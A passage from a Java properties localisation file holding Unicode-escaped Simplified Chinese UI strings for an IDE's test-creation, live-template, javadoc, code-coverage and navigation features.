\\u5206\\u652f\\u7684\\u503c\n\nintention.create.test=\\u521b\\u5efa\\u6d4b\\u8bd5\nintention.create.test.dialog.testing.library=\\u6d4b\\u8bd5\\u5e93:(&L)\nintention.create.test.dialog.language=\\u8bed\\u8a00:\nintention.create.test.dialog.class.name=\\u7c7b\\u540d:\nintention.create.test.dialog.super.class=\\u8d85\\u7c7b:\nintention.create.test.dialog.choose.super.class=\\u9009\\u62e9\\u8d85\\u7c7b\nintention.create.test.dialog.generate=\\u751f\\u6210:\nintention.create.test.dialog.show.inherited=\\u663e\\u793a\\u7ee7\\u627f\\u7684\\u65b9\\u6cd5(&I)\nintention.create.test.dialog.setUp=setUp/@Before(&U)\nintention.create.test.dialog.tearDown=tearDown/@After(&D)\nintention.create.test.dialog.select.methods=\\u751f\\u6210\\u6d4b\\u8bd5\\u65b9\\u6cd5\\u4e3a:(&M)\nintention.create.test.dialog.library.not.found={0} \\u5e93\\u5728\\u8be5\\u6a21\\u5757\\u4e2d\\u672a\\u627e\\u5230\nintention.create.test.dialog.fix.library=\\u4fee\\u590d\nintention.create.test.dialog.java=Java\n\nintention.wrap.with.unmodifiable=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684\\u96c6\\u5408\\u6216 map \\u5305\\u88c5\nintention.wrap.with.unmodifiable.list=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 list \\u5305\\u88c5\nintention.wrap.with.unmodifiable.set=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 set \\u5305\\u88c5\nintention.wrap.with.unmodifiable.map=\\u7528\\u4e0d\\u53ef\\u4fee\\u6539\\u7684 map \\u5305\\u88c5\n\nlightbulb.tooltip=\\u70b9\\u51fb\\u6216\\u6309 {0}\ndialog.intention.settings.intention.list.title=\\u610f\\u5411\\u5217\\u8868\ndialog.intention.settings.description.panel.title=\\u63cf\\u8ff0:\ndialog.intention.settings.description.usage.example.title=\\u4f7f\\u7528\\u793a\\u4f8b\nintention.settings=\\u610f\\u5411\nintention.settings.category.text=\\u60a8\\u9009\\u62e9\\u4e86\\u610f\\u5411\\u7c7b\\u522b {0}.
\\u901a\\u8fc7\\u70b9\\u51fb\\u590d\\u9009\\u6846\\uff0c\\u60a8\\u53ef\\u4ee5\\u542f\\u7528/\\u7981\\u7528\\u6b64\\u7c7b\\u522b\\u7684\\u6240\\u6709\\u610f\\u5411\\u3002\\u8981\\u542f\\u7528/\\u7981\\u7528\\u4e00\\u4e2a\\u7279\\u5b9a\\u610f\\u5411\\uff0c\\u5728\\u8be5\\u7c7b\\u522b\\u91cc\\u9762\\u9009\\u62e9\\u3002\ntemplates.postfix.settings.category.text=\\u4f60\\u9009\\u62e9\\u4e86\\u540e\\u7f00\\u8865\\u5168\\u8bed\\u8a00\\u3002
\\u901a\\u8fc7\\u70b9\\u51fb\\u590d\\u9009\\u6846\\uff0c\\u60a8\\u53ef\\u4ee5\\u542f\\u7528/\\u7981\\u7528\\u8be5\\u7c7b\\u522b\\u7684\\u6240\\u6709\\u540e\\u7f00\\u8865\\u5168\\u6a21\\u677f\\u3002
\\u8981\\u542f\\u7528/\\u7981\\u7528\\u4e00\\u4e2a\\u540e\\u7f00\\u6a21\\u677f\\uff0c\\u5728\\u8be5\\u7ec4\\u91cc\\u9009\\u62e9\\u3002\ntemplates.postfix.settings.category.before=\\u6b64\\u5904\\u5c06\\u663e\\u793a\\u5177\\u6709\\u6240\\u9009\\u6a21\\u677f\\u7684\\u793a\\u4f8b\\u4ee3\\u7801\\u3002\\n \\u95ea\\u70c1\\u7684\\u77e9\\u5f62 \\u663e\\u793a\\u610f\\u5411\\u9002\\u7528\\u7684\\u5730\\u65b9\\u3002\ntemplates.postfix.settings.category.after=\\u540e\\u7f00\\u8865\\u5168\\u6267\\u884c\\u7684\\u7ed3\\u679c\\u5c06\\u663e\\u793a\\u5728\\u8fd9\\u91cc\\u3002\ntemplates.postfix.editable.description=\\u7528\\u6237\\u5b9a\\u4e49\\u7684\\u540e\\u7f00\\u6a21\\u677f\njavadoc.description.copied.from.interface=\\u4ece\\u63a5\\u53e3\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.description.copied.from.class=\\u4ece\\u7c7b\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.description.copied.from.field=\\u4ece\\u5b57\\u6bb5\\u590d\\u5236\\u7684\\u63cf\\u8ff0\\uff1a\njavadoc.deprecated=\\u8fc7\\u65f6\\u7684\njavadoc.since=\\u81ea:\njavadoc.see.also=\\u8bf7\\u53c2\\u9605:\njavadoc.parameters=\\u53c2\\u6570:\njavadoc.returns=\\u8fd4\\u56de:\njavadoc.throws=\\u629b\\u51fa:\njavadoc.method.in.interface={0} \\u5728\\u63a5\\u53e3 {1}\njavadoc.method.in.class={0} \\u5728\\u7c7b {1}\njavadoc.method.overrides=\\u91cd\\u5199:\njavadoc.method.specified.by=\\u6307\\u5b9a\\u8005:\njavadoc.external.fetch.error.message=\\u65e0\\u6cd5\\u83b7\\u53d6\\u8fdc\\u7a0b\\u6587\\u6863\\uff1a\\u5185\\u90e8\\u9519\\u8bef\nsearching.for.implementations=\\u641c\\u7d22\\u5b9e\\u73b0...\n\ngoto.implementation.chooserTitle=\\u9009\\u62e9 {0} \\u7684\\u5b9e\\u73b0\\u65b9\\u6cd5({1} \\u627e\\u5230 {2})\ngoto.implementation.findUsages.title={0} \\u7684\\u5b9e\\u73b0\ngoto.implementation.notFound=\\u627e\\u4e0d\\u5230\\u5b9e\\u73b0\n\ngoto.test.chooserTitle.test=\\u9009\\u62e9 {0} \\u7684\\u6d4b\\u8bd5({1} \\u627e\\u5230 {2})\ngoto.test.findUsages.test.title={0} \\u7684\\u6d4b\\u8bd5\ngoto.test.chooserTitle.subject=\\u9009\\u62e9 {0} \\u7684\\u6d4b\\u8bd5\\u5bf9\\u8c61({1} \\u627e\\u5230 {2})\ngoto.test.findUsages.subject.title={0} \\u7684\\u6d4b\\u8bd5\\u5bf9\\u8c61\ngoto.test.notFound=\\u6ca1\\u6709\\u627e\\u5230\\u6d4b\\u8bd5\\u5bf9\\u8c61\n\nincremental.search.tooltip.prefix=\\u641c\\u7d22:\ngoto.super.property.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u5c5e\\u6027\ngoto.super.method.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.method.of.chooser.title=\\u9009\\u62e9 {0} \\u7684\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.method.findUsages.title={0} \\u7684\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.class.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u6216\\u63a5\\u53e3\njavadoc.action.back=\\u540e\\u9000\njavadoc.action.forward=\\u5411\\u524d\njavadoc.action.view.external=\\u67e5\\u770b\\u5916\\u90e8\\u6587\\u6863\njavadoc.documentation.not.found.message=\\u627e\\u4e0d\\u5230\\u6b64\\u5143\\u7d20\\u7684\\u6587\\u6863\\u3002\\n\\u8bf7\\u5728\\u201c\\u9879\\u76ee\\u8bbe\\u7f6e\\u201d\\u4e2d\\u5c06\\u6240\\u6709\\u9700\\u8981\\u7684\\u8def\\u5f84\\u6dfb\\u52a0\\u5230 API \\u6587\\u6863\\u3002\njavadoc.documentation.not.found.title=\\u6ca1\\u6709\\u6587\\u6863\njavadoc.fetching.progress=\\u83b7\\u53d6\\u6587\\u6863...\nno.documentation.found=\\u6ca1\\u6709\\u627e\\u5230\\u6587\\u6863\\u3002\njavadoc.constructor.candidates=new {0}() \\u7684\\u5019\\u9009\\u662f:
{1}\njavadoc.candidates=\\u8c03\\u7528 {0} \\u7684\\u65b9\\u6cd5\\u5019\\u9009\\u662f:

{1}\njavadoc.candidates.not.found=\\u6ca1\\u6709\\u627e\\u5230\\u8c03\\u7528 {0} \\u7684\\u65b9\\u6cd5\\u5019\\u9009\\u3002\ndeclaration.navigation.title=\\u9009\\u62e9\\u58f0\\u660e\ntemplate.shortcut.enter=\\u56de\\u8f66\ntemplate.shortcut.tab=Tab\ntemplate.shortcut.space=\\u7a7a\\u683c\ntemplate.shortcut.custom=\\u81ea\\u5b9a\\u4e49\ntemplate.shortcut.none=\\u6ca1\\u6709\ndialog.edit.live.template.title=\\u7f16\\u8f91\\u4ee3\\u7801\\u6a21\\u677f\ndialog.add.live.template.title=\\u6dfb\\u52a0\\u4ee3\\u7801\\u6a21\\u677f\ntemplates.no.defined=\\u5728\\u8fd9\\u4e2a\\u4e0a\\u4e0b\\u6587\\u4e2d\\u6ca1\\u6709\\u5b9a\\u4e49\\u6a21\\u677f\ntemplates.surround.no.defined=\\u5728\\u6b64\\u4e0a\\u4e0b\\u6587\\u4e2d\\u6ca1\\u6709\\u5b9a\\u4e49\\u5305\\u56f4\\u6a21\\u677f\ntemplates.settings.page.title=\\u4ee3\\u7801\\u6a21\\u677f\ntemplates.select.template.chooser.title=\\u9009\\u62e9\\u6a21\\u677f\ntemplates.dialog.edit.variables.title=\\u7f16\\u8f91\\u6a21\\u677f\\u53d8\\u91cf\ntemplates.dialog.edit.variables.border.title=\\u53d8\\u91cf\ntemplates.dialog.edit.variables.action.move.up=\\u4e0a\\u79fb(&U)\ntemplates.dialog.edit.variables.action.move.down=\\u4e0b\\u79fb(&D)\ntemplates.dialog.edit.variables.table.column.name=\\u540d\\u79f0\ntemplates.dialog.edit.variables.table.column.expression=\\u8868\\u8fbe\\u5f0f\ntemplates.dialog.edit.variables.table.column.default.value=\\u9ed8\\u8ba4\\u503c\ntemplates.dialog.edit.variables.table.column.skip.if.defined=\\u5982\\u679c\\u5df2\\u5b9a\\u4e49\\u5219\\u8df3\\u8fc7\ntemplates.dialog.table.column.abbreviation=\\u7f29\\u5199\ntemplates.dialog.table.column.description=\\u63cf\\u8ff0\ntemplates.dialog.table.column.active=\\u6fc0\\u6d3b\ntemplates.dialog.shortcut.chooser.label=\\u9ed8\\u8ba4\\u5c55\\u5f00\\u901a\\u8fc7\ndialog.copy.live.template.title=\\u590d\\u5236\\u4ee3\\u7801\\u6a21\\u677f\ndialog.edit.template.shortcut.default=\\u9ed8\\u8ba4({0})\ndialog.edit.template.template.text.title=\\u6a21\\u677f\\u6587\\u672c:(&T)\ndialog.edit.template.button.edit.variables=\\u7f16\\u8f91\\u53d8\\u91cf(&E)\ndialog.edit.template.label.abbreviation=\\u7f29\\u5199:(&B)\ndialog.edit.template.label.group=\\u7ec4:(&G)\ndialog.edit.template.label.description=\\u63cf\\u8ff0:(&D)\ndialog.edit.template.options.title=\\u9009\\u9879\ndialog.edit.template.label.expand.with=\\u5c55\\u5f00(&X)\ndialog.edit.template.checkbox.reformat.according.to.style=\\u6839\\u636e\\u6837\\u5f0f\\u91cd\\u65b0\\u683c\\u5f0f\\u5316(&R)\ndialog.edit.template.checkbox.shorten.fq.names=\\u7f29\\u77ed FQ \\u540d\\u79f0(&F)\ndialog.edit.template.checkbox.use.static.import=\\u5982\\u679c\\u53ef\\u80fd\\uff0c\\u4f7f\\u7528\\u9759\\u6001\\u5bfc\\u5165(&I)\ndialog.edit.template.context.title=\\u4e0a\\u4e0b\\u6587\ndialog.edit.template.checkbox.html=HTML(&H)\ndialog.edit.template.checkbox.xml=XML(&X)\ndialog.edit.template.checkbox.jsp=JSP(&P)\ndialog.edit.template.checkbox.smart.type.completion=\\u667a\\u80fd\\u7c7b\\u578b\\u8865\\u5168(&O)\ndialog.edit.template.error.title=\\u65e0\\u6cd5\\u4fdd\\u5b58\ndialog.edit.template.error.malformed.abbreviation=\\u65e0\\u6cd5\\u4fdd\\u5b58\\u6a21\\u677f\\u3002\\n\\u6a21\\u677f\\u7f29\\u5199\\u5e94\\u4ec5\\u5305\\u542b\\u5b57\\u6bcd\\uff0c\\u6570\\u5b57\\uff0c\\u70b9\\u548c\\u8fde\\u5b57\\u7b26\\u3002\ndialog.edit.template.error.already.exists=\\u65e0\\u6cd5\\u4fdd\\u5b58\\u6a21\\u677f\\u3002\\n\\u7f29\\u5199\\u4e3a \"{0}\" \\u7684\\u6a21\\u677f\\n\\u5df2\\u7ecf\\u5b58\\u5728\\u4e8e\\u7ec4 \"{1}\" 
\\u4e2d\\u3002\\n\\u8bf7\\u9009\\u62e9\\u5176\\u4ed6\\u7f29\\u5199\\u6216\\u7ec4\\u3002\nfinish.template.command=\\u5b8c\\u6210\\u6a21\\u677f\ninsert.code.template.command=\\u63d2\\u5165\\u4ee3\\u7801\\u6a21\\u677f\ntemplate.next.variable.command=\\u8f6c\\u5230\\u4e0b\\u4e00\\u4e2a\\u4ee3\\u7801\\u6a21\\u677f\\u9009\\u9879\\u5361\ntemplate.previous.variable.command=\\u8f6c\\u5230\\u4e0a\\u4e00\\u4e2a\\u4ee3\\u7801\\u6a21\\u677f\\u9009\\u9879\\u5361\nmacro.array.variable=arrayVariable()\nmacro.capitalize.string=capitalize(String)\nmacro.cast.to.left.side.type=castToLeftSideType()\nmacro.classname=className()\nmacro.component.type.of.array=componentTypeOf(Array)\nmacro.current.package=currentPackage()\nmacro.decapitalize.string=decapitalize(String)\nmacro.firstWord.string=firstWord(String)\nmacro.undescoresToSpaces.string=underscoresToSpaces(String)\nmacro.spacesToUnderscores.string=spacesToUnderscores(String)\nmacro.undescoresToCamelCase.string=underscoresToCamelCase(String)\nmacro.capitalizeAndUnderscore.string=capitalizeAndUnderscore(String)\nmacro.descendant.classes.enum=descendantClassesEnum(String)\nmacro.enum=enum(...)\nmacro.expected.type=expectedType()\nmacro.groovy.script=groovyScript(\"groovy code\")\nmacro.guess.element.type.of.container=guessElementType(Container)\nmacro.expression.type=expressionType(Expression)\nmacro.iterable.component.type=iterableComponentType(ArrayOrIterable)\nmacro.iterable.variable=iterableVariable()\nmacro.linenumber=lineNumber()\nmacro.methodname=methodName()\nmacro.method.parameters=methodParameters()\nmacro.qualified.class.name=qualifiedClassName()\nmacro.right.side.type=rightSideType()\nmacro.suggest.index.name=suggestIndexName()\nmacro.suggest.variable.name=suggestVariableName()\nmacro.suggest.first.variable.name=suggestFirstVariableName()\nmacro.variable.of.type=variableOfType(Type)\nmacro.file.name=fileName()\nmacro.file.name.without.extension=fileNameWithoutExtension()\ncommand.name.surround.with.runtime.cast=\\u7528\\u8fd0\\u884c\\u65f6\\u8f6c\\u6362\\u5305\\u56f4\ninspection.i18n.expression.is.invalid.error.message=\\u56fd\\u9645\\u5316\\u8868\\u8fbe\\u5f0f\\u6a21\\u677f\\u4e0d\\u662f\\u6709\\u6548\\u7684\\u8868\\u8fbe\\u5f0f\ninspection.error.dialog.title=\\u9519\\u8bef\nlivetemplate.description.tag.pair=\\u6807\\u7b7e\\u5bf9\nlivetemplate.description.itar=\\u8fed\\u4ee3\\u6570\\u7ec4\\u5143\\u7d20\nlivetemplate.description.itco=\\u8fed\\u4ee3 java.util.Collection \\u7684\\u5143\\u7d20\nlivetemplate.description.iten=\\u8fed\\u4ee3 java.util.Enumeration\nlivetemplate.description.itit=\\u8fed\\u4ee3 java.util.Iterator\nlivetemplate.description.itli=\\u8fed\\u4ee3 java.util.List \\u7684\\u5143\\u7d20\nlivetemplate.description.ittok=\\u8fed\\u4ee3\\u5b57\\u7b26\\u4e32\\u4e2d\\u7684\\u5b57\\u7b26\nlivetemplate.description.ritar=\\u4ee5\\u76f8\\u53cd\\u7684\\u987a\\u5e8f\\u8fed\\u4ee3\\u6570\\u7ec4\\u7684\\u5143\\u7d20\nlivetemplate.description.iter=\\u8fed\\u4ee3 Iterable | \\u6570\\u7ec4\nlivetemplate.description.itover=\\u8fed\\u4ee3 Iterable \\u6216\\u6570\\u7ec4\\u9009\\u62e9\nlivetemplate.description.inst=\\u4f7f\\u7528 instanceof \\u68c0\\u67e5\\u5bf9\\u8c61\\u7c7b\\u578b\\u5e76\\u5c06\\u5176\\u964d\\u7ea7\nlivetemplate.description.lst=\\u83b7\\u53d6\\u6570\\u7ec4\\u7684\\u6700\\u540e\\u4e00\\u4e2a\\u5143\\u7d20\nlivetemplate.description.mn=\\u4e3a\\u53d8\\u91cf\\u8bbe\\u7f6e\\u8f83\\u5c0f\\u7684\\u503c\nlivetemplate.description.mx=\\u4e3a\\u53d8\\u91cf\\u8bbe\\u7f6e\\u66f4\\u5927\\u7684\\u503c\nlivetemplate.description.psvm=main() 
\\u65b9\\u6cd5\\u58f0\\u660e\nlivetemplate.description.toar=\\u5c06 java.util.Collection \\u7684\\u5143\\u7d20\\u5b58\\u50a8\\u5230\\u6570\\u7ec4\\u4e2d\nlivetemplate.description.lazy=\\u6267\\u884c\\u5ef6\\u8fdf\\u521d\\u59cb\\u5316\nlivetemplate.description.if.not.null=\\u63d2\\u5165 'if not null' \\u8bed\\u53e5\nlivetemplate.description.if.null=\\u63d2\\u5165 'if null' \\u8bed\\u53e5\nlivetemplate.description.geti=\\u63d2\\u5165\\u5355\\u4f8b\\u65b9\\u6cd5 getInstance\nlivetemplate.description.serr=\\u6253\\u5370\\u4e00\\u4e2a\\u5b57\\u7b26\\u4e32\\u5230 System.err\nlivetemplate.description.sout=\\u6253\\u5370\\u4e00\\u4e2a\\u5b57\\u7b26\\u4e32\\u5230 System.out\nlivetemplate.description.souf=\\u6253\\u5370\\u4e00\\u4e2a\\u683c\\u5f0f\\u5316\\u5b57\\u7b26\\u4e32\\u5230 System.out\nlivetemplate.description.soutm=\\u6253\\u5370\\u5f53\\u524d\\u7684\\u7c7b\\u540d\\u548c\\u65b9\\u6cd5\\u540d\\u5230 System.out\nlivetemplate.description.soutp=\\u6253\\u5370\\u65b9\\u6cd5\\u53c2\\u6570\\u7684\\u540d\\u79f0\\u548c\\u503c\\u5230 System.out\nlivetemplate.description.soutv=\\u6253\\u5370\\u4e00\\u4e2a\\u503c System.out\nlivetemplate.description.st=String\nlivetemplate.description.psf=public static final\nlivetemplate.description.prsf=private static final\nlivetemplate.description.psfi=public static final int\nlivetemplate.description.psfs=public static final String\nlivetemplate.description.thr=throw new\nlivetemplate.description.surround.braces=\\u7528{}\\u5305\\u56f4\nlivetemplate.description.surround.parens=\\u7528 () \\u5305\\u56f4\nlivetemplate.description.surround.tag=\\u7528 \\u5305\\u56f4\nlivetemplate.description.surround.cdata.in.xmlorhtmlorjsp=\\u7528 CDATA \\u90e8\\u5206\\u5305\\u56f4\nlivetemplate.description.surround.with.callable=\\u7528 Callable \\u5305\\u56f4\nlivetemplate.description.surround.with.read.lock=\\u7528 ReadWriteLock.readLock \\u5305\\u56f4\nlivetemplate.description.surround.with.write.lock=\\u7528 ReadWriteLock.writeLock \\u5305\\u56f4\nquickfix.add.variable.text=\\u521d\\u59cb\\u5316\\u53d8\\u91cf ''{0}''\nquickfix.add.variable.family.name=\\u521d\\u59cb\\u5316\\u53d8\\u91cf\ninspection.i18n.quickfix.annotate.as=\\u6ce8\\u89e3\\u4e3a @{0}\ninspection.i18n.quickfix.annotate.element.as=\\u6ce8\\u89e3 {0} ''{1}'' \\u4e3a @{2}\ninspection.i18n.quickfix.annotate=\\u6ce8\\u89e3...\ninspection.i18n.quickfix.annotate.element=\\u6ce8\\u89e3 {0} ''{1}''...\ndisable.intention.action=\\u7981\\u7528 ''{0}''\nenable.intention.action=\\u542f\\u7528 ''{0}''\nunder.construction.string=\\u6b63\\u5728\\u6784\\u5efa\\u3002\ninspection.i18n.option.ignore.comment.pattern=\\u5ffd\\u7565\\u5305\\u542b\\u6b64\\u6ce8\\u91ca\\u7684\\u884c(java.util.Pattern \\u683c\\u5f0f\\u7684\\u6a21\\u5f0f)\\uff1a\ninspection.i18n.option.ignore.comment.title=Non-Nls \\u6ce8\\u91ca\\u6a21\\u5f0f\ninspection.i18n.option.ignore.assigned.to.constants=\\u5ffd\\u7565\\u5206\\u914d\\u7ed9\\u5e38\\u91cf\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.tostring=\\u5ffd\\u7565 toString() \\u65b9\\u6cd5\\u7684\\u5185\\u5bb9\nintention.move.initializer.to.constructor=\\u5c06\\u521d\\u59cb\\u5316\\u5668\\u79fb\\u5230\\u6784\\u9020\\u51fd\\u6570\nintention.move.initializer.to.set.up=\\u5c06\\u521d\\u59cb\\u5316\\u5668\\u79fb\\u52a8\\u5230 setUp \\u65b9\\u6cd5\nintention.move.field.assignment.to.declaration=\\u5c06\\u8d4b\\u503c\\u79fb\\u5230\\u5b57\\u6bb5\\u58f0\\u660e\ni18nize.jsp.error=\\u8bf7\\u9009\\u62e9 JSP 
\\u6587\\u672c\\u8fdb\\u884c\\u56fd\\u9645\\u5316\\u3002\\n\\u786e\\u4fdd\\u60a8\\u6ca1\\u6709\\u9009\\u62e9\\u4efb\\u4f55 scriptlet\\uff0c\\u81ea\\u5b9a\\u4e49\\u6807\\u7b7e\\u6216\\u5176\\u4ed6\\u5176\\u4ed6\\u8bed\\u8a00\\u5143\\u7d20\\u3002\\n\\u6b64\\u5916\\uff0c\\u9009\\u62e9\\u5185\\u7684 HTML \\u6807\\u7b7e\\u5fc5\\u987b\\u5e73\\u8861\\u3002\ni18nize.error.title=\\u4e0d\\u80fd\\u56fd\\u9645\\u5316\\u6240\\u9009\\u5185\\u5bb9\ni18nize.error.message=\\u60a8\\u53ea\\u80fd\\u56fd\\u9645\\u5316 Java \\u5b57\\u7b26\\u4e32\\u6587\\u5b57\\u6216\\u5176\\u5b50\\u5b57\\u7b26\\u4e32\\u3002\\n\\u8bf7\\u5c06\\u63d2\\u5165\\u7b26\\u6307\\u5411 Java \\u5b57\\u7b26\\u4e32\\u6587\\u5b57\\u6216\\u9009\\u62e9\\u5176\\u4e2d\\u7684\\u4e00\\u90e8\\u5206\\u3002\ndisplay.coverage.prompt=\\u8981\\u663e\\u793a ''{0}'' \\u7684\\u8986\\u76d6\\u7387\\u6570\\u636e\\u5417\\uff1f\ncode.coverage=\\u4ee3\\u7801\\u8986\\u76d6\\u7387\ncoverage.button.add.package=\\u6dfb\\u52a0\\u5305\ncoverage.pattern.filter.editor.choose.package.title=\\u9009\\u62e9\\u5305\nno.coverage=\\u6ca1\\u6709\\u8986\\u76d6\ncode.coverage.is.not.supported=jre 5.0\\u6216\\u66f4\\u9ad8\\u7248\\u672c\\u652f\\u6301\\u4ee3\\u7801\\u8986\\u76d6\ntitle.popup.show.coverage=\\u8986\\u76d6\\u7387\\u5957\\u4ef6\nprompt.remove.coverage=\\u4f60\\u8981\\u79fb\\u9664 ''{0}'' \\u8986\\u76d6\\u7387\\u6570\\u636e\\u5417?\ntitle.remove.coverage.data=\\u79fb\\u9664\\u8986\\u76d6\\u7387\\u6570\\u636e\ncoverage.data.outdated=\\u8986\\u76d6\\u7387\\u6570\\u636e\\u5df2\\u8fc7\\u671f\ncoverage.data.not.found=\\u672a\\u627e\\u5230\\u8986\\u76d6\\u7387\\u6570\\u636e\nerror.cannot.resolve.class=\\u65e0\\u6cd5\\u89e3\\u6790\\u7c7b ''{0}''\nimplementation.view.title={0} \\u7684\\u5b9a\\u4e49\njavadoc.info.title=\\u6587\\u6863\\u4e3a {0}\nintention.intercept.ejb.method.or.class.family=\\u6dfb\\u52a0 EJB \\u62e6\\u622a\\u5668\nintention.intercept.ejb.method.or.class.class.text=\\u4e3a EJB \\u7c7b ''{0}'' \\u6dfb\\u52a0\\u62e6\\u622a\\u5668\nintention.intercept.ejb.method.or.class.method.text=\\u4e3a\\u4e1a\\u52a1\\u65b9\\u6cd5 ''{0}'' \\u6dfb\\u52a0\\u62e6\\u622a\\u5668\nintention.edit.interceptor.binding.family=\\u62e6\\u622a\\u5668\\u7ed1\\u5b9a\nintention.edit.interceptor.binding.text=\\u7f16\\u8f91\\u62e6\\u622a\\u5668 ''{0}'' \\u7684\\u7ed1\\u5b9a\npowered.by=\\u6280\\u672f\\u652f\\u6301\\uff1a\npowered.by.plugin=''{0}'' \\u63d2\\u4ef6\nerror.cannot.convert.default.message=\\u65e0\\u6548\\u7684\\u503c:''{0}''\nerror.cannot.resolve.default.message=\\u65e0\\u6cd5\\u89e3\\u6790\\u7b26\\u53f7 ''{0}''\nerror.cannot.resolve.0.1=\\u65e0\\u6cd5\\u89e3\\u6790 {0} ''{1}''\nunknown.encoding.0=\\u672a\\u77e5\\u7f16\\u7801\\uff1a''{0}''\nerror.unknown.enum.value.message=\\u672a\\u77e5\\u7684\\u679a\\u4e3e\\u503c ''{0}''\ni18nize.cant.create.properties.file.because.its.name.is.associated=\\u4e0d\\u80fd\\u521b\\u5efa\\u5c5e\\u6027\\u6587\\u4ef6 ''{0}''\\uff0c\\u56e0\\u4e3a\\u5b83\\u7684\\u540d\\u79f0\\u4e0e {1} \\u76f8\\u5173\\u8054\\u3002\ni18nize.error.creating.properties.file=\\u521b\\u5efa\\u5c5e\\u6027\\u6587\\u4ef6\\u65f6\\u51fa\\u9519\nnode.method.tooltip=\\u65b9\\u6cd5\nnode.field.tooltip=\\u5b57\\u6bb5\nnode.annotation.tooltip=\\u6ce8\\u89e3\nnode.anonymous.class.tooltip=\\u533f\\u540d\\u7c7b\nnode.enum.tooltip=\\u679a\\u4e3e\nnode.exception.tooltip=\\u5f02\\u5e38\nnode.interface.tooltip=\\u63a5\\u53e3\nnode.junit.test.tooltip=JUnit \\u6d4b\\u8bd5\nnode.runnable.class.tooltip=Runnable 
\\u7c7b\nnode.class.tooltip=\\u7c7b\nnode.excluded.flag.tooltip=\\u6392\\u9664\nnode.abstract.flag.tooltip=Abstract\nnode.final.flag.tooltip=Final\nnode.static.flag.tooltip=Static\nmultiple.implementations.tooltip=\\u591a\\u4e2a\\u5b9e\\u73b0\nstatic.class.initializer={0} \\u7c7b\\u521d\\u59cb\\u5316\\u5668\n\n# suppress inspection \"UnusedProperty\"\nintentions.category.ejb=EJB\nset.language.level=\\u8bbe\\u7f6e\\u8bed\\u8a00\\u7ea7\\u522b\nset.language.level.to.0=\\u8bbe\\u7f6e\\u8bed\\u8a00\\u7ea7\\u522b\\u4e3a {0}\nremove.annotation=\\u79fb\\u9664\\u6ce8\\u89e3\nannotate.intention.chooser.title=\\u9009\\u62e9\\u8981\\u6dfb\\u52a0\\u7684\\u6ce8\\u89e3\ndeannotate.intention.action.text=\\u53d6\\u6d88\\u6ce8\\u89e3\ndeannotate.intention.chooser.title=\\u9009\\u62e9\\u8981\\u5220\\u9664\\u7684\\u6ce8\\u89e3\njavadoc.type.parameters=\\u7c7b\\u578b\\u53c2\\u6570:\nhighlight.overridden.classes.chooser.title=\\u9009\\u62e9\\u8981\\u7a81\\u51fa\\u663e\\u793a\\u8986\\u76d6\\u65b9\\u6cd5\\u7684\\u7c7b\nno.methods.overriding.0.are.found=\\u6ca1\\u6709\\u627e\\u5230 {0, choice, 0#|1# '{1}' |2#these classes} \\u91cd\\u5199\\u65b9\\u6cd5\ncopy.abstract.method.no.existing.implementations.found=\\u627e\\u4e0d\\u5230\\u73b0\\u6709\\u7684\\u5b9e\\u73b0\ncopy.abstract.method.intention.name=\\u4f7f\\u7528 ''{0}'' \\u7684\\u73b0\\u6709\\u5b9e\\u73b0\ncopy.abstract.method.popup.title=\\u9009\\u62e9\\u8981\\u590d\\u5236\\u7684\\u5b9e\\u73b0\ncopy.abstract.method.title=\\u4f7f\\u7528\\u62bd\\u8c61\\u65b9\\u6cd5\\u5b9e\\u73b0\ni18nize.empty.file.path=\\u8bf7\\u6307\\u5b9a\\u5c5e\\u6027\\u7684\\u6587\\u4ef6\\u8def\\u5f84\nchoose.type.popup.title=\\u9009\\u62e9\\u7c7b\\u578b\ncast.expression=\\u8f6c\\u6362\\u8868\\u8fbe\\u5f0f\ncast.to.0=\\u8f6c\\u6362\\u4e3a ''{0}''\nclass.completion.file.path=\\u518d\\u6b21\\u6309 {0} \\u641c\\u7d22\\u6240\\u6709\\u5339\\u914d\\u7684\\u9879\\u76ee\\u6587\\u4ef6\nclass.completion.file.path.all.variants=\\u6309 {0} \\u641c\\u7d22\\u4efb\\u4f55\\u7c7b\\u578b\\u7684\\u5339\\u914d\\u6587\\u4ef6\nproperty.has.more.parameters.than.passed=\\u5c5e\\u6027 ''{0}'' \\u671f\\u671b {1} {1, choice, 1#\\u4e2a\\u53c2\\u6570|2#\\u4e2a\\u53c2\\u6570}, \\u4f20\\u4e86 {2}\ncreate.file.family=\\u521b\\u5efa\\u6587\\u4ef6\nrename.file.reference.family=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\\u53c2\\u8003\nrename.file.reference.text=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\\u53c2\\u8003\\u4e3a {0}\ncreate.directory.text=\\u521b\\u5efa\\u76ee\\u5f55 {0}\ncreate.file.text=\\u521b\\u5efa\\u6587\\u4ef6 {0}\ncreate.file.incorrect.path.hint=\\u65e0\\u6cd5\\u627e\\u5230\\u6216\\u521b\\u5efa\\u76ee\\u6807\\u76ee\\u5f55 for ''{0}''\ncreate.tagfile.text=\\u521b\\u5efa\\u6807\\u8bb0\\u6587\\u4ef6 {0}\nrename.file.fix=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\nrename.element.family=\\u91cd\\u547d\\u540d\\u5143\\u7d20\nrename.public.class.text=\\u5c06\\u7c7b ''{0}'' \\u91cd\\u547d\\u540d\\u4e3a ''{1}''\nrename.named.element.text=\\u5c06 ''{0}'' \\u91cd\\u547d\\u540d\\u4e3a ''{1}''\ndialog.edit.template.checkbox.html.text=HTML \\u6587\\u672c\ndialog.edit.template.checkbox.xsl.text=XSL \\u6587\\u672c\nhighlight.imported.classes.chooser.title=\\u9009\\u62e9 Imported \\u7c7b\\u9ad8\\u4eae\\u663e\\u793a\nhighlight.imported.members.chooser.title=\\u9009\\u62e9 Imported 